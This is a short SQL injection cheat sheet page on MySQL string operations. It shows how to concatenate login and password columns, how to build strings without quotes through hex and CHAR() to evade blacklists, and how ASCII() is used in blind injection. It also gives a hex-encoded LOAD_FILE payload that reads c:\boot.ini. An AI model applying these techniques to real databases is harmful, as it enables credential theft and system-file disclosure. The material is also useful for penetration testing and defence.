====== Hacking - SQL Injection - MySQL - String Operations ======
String related operations can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.
===== String Concatenation =====
||
SELECT login || '-' || password FROM members
**NOTE:** About MySQL **"||"**
If MySQL is running in ANSI mode it's going to work but otherwise MySQL accepts it as a `logical operator` and will return 0.
A better way to do it is using **CONCAT()** function in MySQL:
CONCAT(str1, str2, str3, ...) (M)
/* Concatenate supplied strings. */
SELECT CONCAT(login, password) FROM members
----
===== Strings without Quotes =====
These are some direct ways to using strings but it's always possible to use **CHAR()** to generate string without quotes.
0x457578 /* Hex Representation of string. */
SELECT 0x457578 /* This will be selected as string in MySQL.*/
In MySQL easy way to generate hex representations of strings use this;
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) /* This will return 'KLM'. */
Hex based SQL Injection Samples
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) /* This will show the content of c:\boot.ini */
----
===== String Modification & Related =====
Return ASCII character value of leftmost character.
ASCII()
SELECT ASCII('a')
A must have function for Blind SQL Injections.
----
Convert an integer of ASCII.
CHAR()
SELECT CHAR(64)